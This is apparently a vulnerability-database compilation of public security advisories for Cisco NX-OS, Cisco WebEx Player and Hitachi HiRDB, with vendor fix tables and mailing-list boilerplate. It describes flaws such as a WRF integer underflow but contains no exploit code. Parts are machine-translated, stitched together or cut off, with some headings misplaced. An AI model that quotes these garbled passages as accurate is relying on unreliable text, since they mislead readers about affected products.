Cisco NX-OS 4.2.x before 4.2(1)SV1(5.1) on Nexus 1000v series switches; 4.x and 5.0.x before 5.0(2)N1(1) on Nexus 5000 series switches; and 4.2.x before 4.2.8, 5.0.x before 5.0.5, and 5.1.x before 5.1.1 on Nexus 7000 series switches allows remote attackers to cause a denial of service (netstack process crash and device reload) via a malformed IP packet, aka Bug IDs CSCti23447, CSCti49507, and CSCtj01991. The problem is Bug ID CSCti23447 , CSCti49507 ,and CSCtj01991 It is a problem.Malformed by a third party IP Service disruption via packets (NetStack Process crash and device reload ) There is a possibility of being put into a state. Adopt the Cisco Nexus OS operating system. Cisco NX-OS software is affected by this vulnerability when the operating system IP stack processes malformed IP packets and obtains Layer 4 (UDP or TCP) information from the packets, which can cause the Cisco Nexus 1000v, 5000 to run software affected by this vulnerability. And 7000 series switches are overloaded.
An attacker can exploit this issue to cause the device to crash, denying service to legitimate users. The Cisco Nexus family consists of a comprehensive switch offering that enables customers to gradually and cost-effectively migrate to 10 Gigabit Ethernet and unified data center fabrics. ----------------------------------------------------------------------
Secunia presentations @ RSA Conference 2012, San Francisco, USA, 27 Feb-02 March
Listen to our Chief Security Specialist, Research Analyst Director, and Director Product Management & Quality Assurance discuss the industry's key topics. Also, visit the Secunia stand #817.
SOLUTION:
Upgrade to version 5.x.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120215-nxos
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
Cisco has released free software updates that address this
vulnerability.
Cisco NX-OS Software versions prior to the First Fixed Release version
are affected. Refer to the Software Versions and Fixes section for
details regarding fixed versions.
To determine the version of Cisco NX-OS Software that is running on a
Cisco Nexus switch, administrators can log in to the device and issue
the "show version" command to display the system banner. The following
example shows how to display the version information for the kickstart
and system image that is running on a device that runs Cisco NX-OS
Release 5.1(3):
switch# show version
Cisco Nexus Operating System (NX-OS) Software
TAC support: http://www.cisco.com/tac
Documents: http://www.cisco.com/en/US/products/ps9372/tsd_products_support_series_home.html
Copyright (c) 2002-2011, Cisco Systems, Inc. All rights reserved.
The copyrights to certain works contained in this software are
owned by other third parties and used and distributed under
license. Certain components of this software are licensed under
the GNU General Public License (GPL) version 2.0 or the GNU
Lesser General Public License (LGPL) Version 2.1. A copy of each
such license is available at
http://www.opensource.org/licenses/gpl-2.0.php and
http://www.opensource.org/licenses/lgpl-2.1.php
Software
BIOS: version 3.22.0
kickstart: version 5.1(3)
system: version 5.1(3)
[...]
Products Confirmed Not Vulnerable
+--------------------------------
Cisco NX-OS Software for products other than the Cisco Nexus 1000v,
5000, and 7000 Series Switches is not affected by this vulnerability. In
this case, an ICMP error message (time exceeded) needs to be
generated. During generation of this ICMP message, the bug could
be triggered.
* Policy-based routing is in use, and to make a routing decision,
an incoming packet needs to be parsed. If the packet is a
malformed TCP segment and the routing policy uses TCP information
for routing decisions, then this bug could be triggered.
* An egress Access Control List (ACL) is applied to an interface
and a malformed IP packet that needs to be forwarded through that
interface is received.
Note: This list is not exhaustive. It contains some of the scenarios
that have been confirmed to trigger the vulnerability described in this
document.
Both through-the-device (transit) traffic and to-the-device traffic may
trigger this vulnerability.
When a system reloads because of this vulnerability, a process called
"netstack" will terminate unexpectedly, and the following message will
be recorded to the system log:
2012 Feb 02 20:32:15 NX-7010 %SYSMGR-2-SERVICE_CRASHED: Service "netstack" (PID 4335) hasn't caught signal 11 (core will be saved). The fix was completed with
CSCti49507. The CVSS scoring in this
security advisory is in accordance with CVSS version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps organizations determine the urgency and priority
of a response.
Cisco has provided a base and temporal score. Customers can also
compute environmental scores that help determine the impact of the
vulnerability in their own networks.
Cisco has provided additional information regarding CVSS at the
following link:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to compute the
environmental impact for individual networks at the following link:
http://intellishield.cisco.com/security/alertmanager/cvss
* CSCti23447, CSCti49507, and CSCtj01991 ("Malformed IP packet causes
Netstack crash")
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the vulnerability that is described in
this advisory may result in a reload of an affected device. Repeated
exploitation could result in a sustained DoS condition.
Software Versions and Fixes
===========================
When considering software upgrades, customers are advised to
consult the Cisco Security Advisories and Responses archive at
http://www.cisco.com/go/psirt and review subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should ensure that the devices to be upgraded
contain sufficient memory and confirm that current hardware and
software configurations will continue to be supported properly by the
new release. If the information is not clear, customers are advised
to contact the Cisco Technical Assistance Center (TAC) or their
contracted maintenance providers.
Each row of the Cisco NX-OS Software table (below) names a Cisco
NX-OS Software release train. If a given release train is vulnerable,
then the earliest possible releases that contain the fix (along with
the anticipated date of availability for each, if applicable) are
listed in the First Fixed Release column of the table. A device that
is running a release in the given train that is earlier than the
release in a specific column (less than the First Fixed Release) is
known to be vulnerable.
Obtaining Fixed Software
========================
Cisco has released free software updates that address the
vulnerability|vulnerabilities described in this advisory. Prior to
deploying software, customers are advised to consult their
maintenance providers or check the software for feature set
compatibility and known issues that are specific to their
environments.
Customers may only install and expect support for feature
sets they have purchased. By installing, downloading,
accessing, or otherwise using such software upgrades, customers
agree to follow the terms of the Cisco software license at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as set forth at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through their
regular update channels. For most customers, upgrades should be obtained
through the Software Center on Cisco.com at http://www.cisco.com.
Customers Using Third-Party Support Organizations
+------------------------------------------------
Customers with Cisco products that are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers,
should contact that organization for assistance with the appropriate
course of action.
The effectiveness of any workaround or fix depends on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Because of the variety of
affected products and releases, customers should consult their
service providers or support organizations to ensure that any applied
workaround or fix is the most appropriate in the intended network
before it is deployed.
Customers Without Service Contracts
+----------------------------------
Customers who purchase directly from Cisco but do not hold a Cisco
service contract and customers who make purchases through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should obtain upgrades by contacting the Cisco
Technical Assistance Center (TAC):
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have the product serial number available and be
prepared to provide the URL of this advisory as evidence of
entitlement to a free upgrade. Customers without service contracts
should request free upgrades through the TAC.
Refer to Cisco Worldwide Contacts at
http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, instructions, and e-mail addresses for support in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco Product Security Incident Response Team (PSIRT) is not
aware of any public announcements or malicious use of the
vulnerability that is described in this advisory.
This vulnerability was discovered while working on customer support
cases.
Status of This Notice: Final
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco Security Intelligence Operations at
the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120215-nxos
Additionally, a text version of this advisory is clear signed with
the Cisco PSIRT PGP key and circulated among the following e-mail
addresses:
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
Future updates of this advisory, if any, will reside on Cisco.com but
may not be announced on mailing lists. Users can monitor this
advisory's URL for any updates.
Revision History
================
+------------------------------------------------------------+
| Revision 1.0 | 2012-February-15 | Initial public release |
+------------------------------------------------------------+
Cisco Security Procedures
=========================
Complete information about reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and registering
to receive security information from Cisco is available on Cisco.com at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This web page includes instructions for press inquiries
regarding Cisco Security Advisories. All Cisco Security Advisories are
available at http://www.cisco.com/go/psirt.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
iF4EAREIAAYFAk873DMACgkQQXnnBKKRMNDlegD/aqbq5hFAjAMvDyhCfSw+b3Jv
OmNKTgR/ebVWuq32C/QA/iIgbVvGoEsARBgsy5EMT86xItQsIFTI6d9NAOnGptEV
=3LfF
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
VAR-201110-0222 | CVE-2011-4004 | Cisco WebEx Recording Format (WRF) player of ATAS32 Buffer overflow vulnerability in processing functions |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Buffer overflow in the ATAS32 processing functionality in the Cisco WebEx Recording Format (WRF) player T26 before SP49 EP40 and T27 before SP28 allows remote attackers to execute arbitrary code via a crafted WRF file. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists in ATAS32.DLL during the parsing of values defined within the WRF file format. The vulnerable code trusts the linesProcessed value from the file, and uses it in some logic to determine the destination pointer for a memcpy. By supplying an overly large linesProcessed value, the subtraction would cause an integer underflow and allows an attacker control of the destination buffer pointer. This can be further leveraged to execute arbitrary code under the context of the current user. Cisco WebEx is a web conferencing solution. When Cisco WebEx parses the value defined in the WRF file format, ATAS32.DLL is flawed. The value is reduced by the large linesProcessed value. Cisco WebEx is prone to multiple remote buffer-overflow vulnerabilities. Failed exploit attempts may result in a denial-of-service condition. More details
can be found at:
http://www.cisco.com/go/psirt
-- Disclosure Timeline:
2011-05-12 - Vulnerability reported to vendor
2011-10-26 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Aniway (Aniway.Anyway@gmail.com)
* Anonymous
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
. ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach?
Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM:
http://secunia.com/products/corporate/vim/ovum_2011_request/
----------------------------------------------------------------------
TITLE:
Cisco WebEx Player WRF File Processing Vulnerabilities
SECUNIA ADVISORY ID:
SA46607
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/46607/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=46607
RELEASE DATE:
2011-10-28
DISCUSS ADVISORY:
http://secunia.com/advisories/46607/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/46607/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46607
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Two vulnerabilities have been reported in Cisco WebEx Player, which
can be exploited by malicious people to compromise a user's system.
SOLUTION:
Update to a fixed version (Please see the vendor's advisory for
details).
PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits TippingPoint.
2) Aniway and Anonymous via ZDI.
ORIGINAL ADVISORY:
Cisco:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111026-webex
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-11-308/
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
The Cisco WebEx Players are applications that are used to play back
WebEx meeting recordings that have been recorded on a WebEx meeting
site or on the computer of an online meeting attendee. The players
can be automatically installed when the user accesses a recording
file that is hosted on a WebEx meeting site. The players can also be
manually installed for offline playback after downloading the
application from www.webex.com
If the WRF player was automatically installed, it will be
automatically upgraded to the latest, nonvulnerable version when
users access a recording file that is hosted on a WebEx meeting site.
If the WRF player was manually installed, users will need to manually
install a new version of the player after downloading the latest
version from www.webex.com
Cisco has released free software updates that address these
vulnerabilities.
This advisory is posted at:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111026-webex
Note: Effective October 18, 2011, Cisco moved the current list of
Cisco Security Advisories and Responses published by Cisco PSIRT. The
new location is http://tools.cisco.com/security/center/publicationListing
You can also navigate to this page from the Cisco
Products and Services menu of the Cisco Security Intelligence
Operations (SIO) Portal. Following this transition, new Cisco
Security Advisories and Responses will be published to the new
location. Although the URL has changed, the content of security
documents and the vulnerability policy are not impacted. Cisco will
continue to disclose security vulnerabilities in accordance with the
published Security Vulnerability Policy.
Affected Products
=================
The vulnerabilities disclosed in this advisory affect the Cisco
WRF players. The Microsoft Windows, Apple Mac OS X, and Linux
versions of the players are all affected. Review the following
table for the list of releases that contain the nonvulnerable
code. Affected versions of the players are those prior to client
build T26 SP49 EP40 and T27 SP28. These build numbers are
available only to WebEx site administrators. End users will see a
version such as "Client build: 27.25.4.11889." This indicates the
server is running software version T27 SP25 EP4.
To determine whether a Cisco WebEx meeting site is running an
affected version of the WebEx client build, users can log in to
their Cisco WebEx meeting site and go to the Support > Downloads
section. The version of the WebEx client build will be displayed
on the right side of the page under "About Support Center." See
"Software Versions and Fixes" for details.
Cisco recommends that users upgrade to the most current version
of the player that is available from www.webex.com/
downloadplayer.html. If the player is no longer needed, it can be
removed using the "Mac Cisco-WebEx Uninstaller" or "Meeting
Services Removal tool" available at support.webex.com/support/
downloads.html.
Users can manually verify the installed version of the WRF player
to determine whether it is affected by these vulnerabilities. To
do so, an administrator must examine the version numbers of the
installed files and determine whether the version of the file
contains the fixed code. Detailed instructions on how to verify
the version numbers are provided in the following sections.
The following tables provide the first nonvulnerable version of
each object.
Microsoft Windows
+----------------
Two dynamically linked libraries (DLLs) were updated on the
Microsoft Windows platform to address the vulnerabilities that
are described in this advisory. These files are in the folder C:\
Program Files\WebEx\Record Playback or C:\Program Files (x86)\
Webex\Record Player. The version number of a DLL can be obtained
by browsing the Record Playback directory in Windows Explorer,
right-clicking on the file name, and choosing Properties. The
Version or Details tab of the Properties page provides details on
the library version. The following table gives the first fixed
version number for each DLL. If the installed versions are equal
to or greater than the versions provided in the table, the system
is not vulnerable.
+----------------------------------------------------------------------------+
| Library | T26 SP49 | T27 SP11 | T27 SP21 | T27 SP25 | T27 SP28 |
| | EP40 | EP26 | EP9 | EP3 | |
|--------------+-------------+------------+----------+----------+------------|
| atas32.dll | Not | 2.6.11.0 | 2.6.21.5 | 2.6.25.0 | 2.6.28.0 |
| | vulnerable | | | | |
|--------------+-------------+------------+----------+----------+------------|
| atdl2006.dll | 2.5.49.4000 | 2.6.1123.1 | 2.6.21.1 | 2.6.20.0 | Not |
| | | | | | vulnerable |
+----------------------------------------------------------------------------+
Mac
+--
A package bundle was updated on the Macintosh platform to
address the vulnerabilities that are described in this advisory.
This file is in each user's home directory, which can be accessed
in ~/Library/Application Support/WebEx Folder/824 for systems
connected to servers running T26 and ~/Library/Application
Support/WebEx Folder/924 for systems connected to servers running
T27. The version can be obtained by browsing to the appropriate
folder in Finder and control-clicking the filename. When the menu
is displayed, select show package contents and then double-click
the Info.plist file. The version number is shown at the bottom of
the displayed table.
+-------------------------------------------------------------------------------+
| Bundle | T26 SP49 | T27 SP11 | T27 SP21 | T27 SP25 | T27 SP28 |
| | EP40 | EP26 | EP9 | EP3 | |
|-------------------+-----------+------------+-----------+----------+------------|
| asplayback.bundle | 6.0.49.40 | 6.10.11.25 | 6.10.21.9 | 6.0.25.3 | 5.25.27.28 |
+-------------------------------------------------------------------------------+
Linux
A shared object was updated on the Linux platform to address the
vulnerabilities that are described in this advisory. This file is
in the ~/.webex directory. The version number of the shared
object can be obtained by performing a directory listing with the
ls command. The version number is provided after the .so
extension.
+---------------------------------------------------------------------------+
| Shared | T26 SP49 | T27 SP11 | T27 SP21 | T27 SP25 | T27 SP28 |
| Object | EP40 | EP26 | EP9 | EP3 | |
|------------+-----------+------------+-----------+------------+------------|
| atascli.so | 1.0.26.41 | 1.11.27.15 | 1.0.27.17 | 1.25.27.17 | 1.28.27.17 |
+---------------------------------------------------------------------------+
Vulnerable Products
+------------------
No other Cisco products are currently known to be affected by these
vulnerabilities.
Details
=======
The WebEx meeting service is a hosted multimedia conferencing
solution that is managed and maintained by Cisco WebEx. The WRF file
format is used to store WebEx meeting recordings that have been
recorded on a WebEx meeting site or on the computer of an online
meeting attendee. The players are applications that are used to play
back and edit recording files (files with a .wrf extension). The WRF
players can be automatically installed when the user accesses a
recording file that is hosted on a WebEx meeting site (for stream
playback mode). The WRF players can also be manually installed after
downloading the application from www.webex.com/downloadplayer.html
to play back recording files locally (for offline playback mode). The vulnerabilities cannot be triggered
by users who are attending a WebEx meeting.
Vulnerability Scoring Details
+----------------------------
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
* Multiple Cisco WebEx Player Buffer Overflow Vulnerabilities
CVSS Base Score - 9.3
Access Vector - Network
Access Complexity - Medium
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 7.7
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the vulnerabilities described in this
document could cause the Cisco WRF player application to crash and,
in some cases, allow a remote attacker to execute arbitrary code on
the system with the privileges of the user who is running the WRF
player application.
Software Versions and Fixes
===========================
When considering software upgrades, also consult:
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
These vulnerabilities are first fixed in the following versions:
* T26 SP49 EP40
* T27 FR20
* T27 SP11 EP23
* T27 SP21 EP9
* T27 SP23
* T27 SP25 EP3
* T27 SP28
The client build is listed in the Support > Downloads section of the
WebEx page after a user authenticates. WebEx bug fixes are cumulative
in a major release. For example, if release T27 SP22 EP9 is fixed,
release T27 SP22 EP23 will also have the software fix. End users
will see a version such as "Client build: 27.25.4.11889." This
indicates the server is running software version T27 SP25 EP4.
If a WRF player was automatically installed, it will be automatically
upgraded to the latest, nonvulnerable version when users access a
recording file that is hosted on a WebEx meeting site.
If a WRF player was manually installed, users will need to manually
install a new version of the player after downloading the latest
version from www.webex.com/downloadplayer.html. If the player is no
longer needed, it can be removed using the "Mac Cisco-WebEx
Uninstaller" or "Meeting Services Removal tool" available at
support.webex.com/support/downloads.html
Workarounds
===========
There are no workarounds for the vulnerabilities disclosed in this
advisory.
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at:
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html
or as otherwise set forth at Cisco.com Downloads at:
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
This section does not apply for vulnerabilities in Cisco WebEx
products.
Customers using Third Party Support Organizations
+------------------------------------------------
This section does not apply for vulnerabilities in Cisco WebEx
products.
Customers without Service Contracts
+----------------------------------
This section does not apply for vulnerabilities in Cisco WebEx
products.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
These vulnerabilities were reported to Cisco by TippingPoint. Cisco
would like to thank TippingPoint for reporting these vulnerabilities
to us.
Status of this Notice: Final
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111026-webex
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-teams@first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+-------------------------------------------------------------------+
| Revision 1.0 | 2011-October-26 | Initial public release |
+-------------------------------------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at:
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices.
All Cisco security advisories are available at:
http://www.cisco.com/go/psirt
+--------------------------------------------------------------------
Copyright 2010-2011 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (SunOS)
iFcDBQFOqCUXQXnnBKKRMNARCO+aAP9IbHs1VnWKq0GY3UPgGavVWYYrypo9uR2g
S1eif/eNEQD7BRMCZrBRVyqMy2c0STwOH9IN35fyqGyLtlO/Nxv4geA=
=eg2S
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
VAR-190001-0281 | No CVE | Hitachi HiRDB unknown code execution vulnerability |
CVSS V2: - CVSS V3: - Severity: - |
Hitachi HiRDB is a database system developed by Hitachi. Hitachi HiRDB has a security vulnerability that could be exploited by remote attackers to execute arbitrary code.
Very few technical details are currently available. We will update this BID when more information emerges. ----------------------------------------------------------------------
The Secunia Vulnerability Intelligence Manager (VIM) enables you to handle vulnerability threats in a simple, cost effective way.
Read more and request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
Hitachi HiRDB Control Manager Agent Unspecified Code Execution
Vulnerability
SECUNIA ADVISORY ID:
SA45156
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/45156/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=45156
RELEASE DATE:
2011-07-09
DISCUSS ADVISORY:
http://secunia.com/advisories/45156/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/45156/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=45156
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in Hitachi HiRDB, which can be
exploited by malicious people to compromise a vulnerable system.
Please see the vendor's advisory for a list of affected versions.
SOLUTION:
Update to a fixed version. Please see the vendor's advisory for
details.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
Hitachi (Japanese):
http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS11-012/index.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-201110-0448 | CVE-2011-3318 | Cisco Video Surveillance Service disruption in cameras ( Device reload ) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
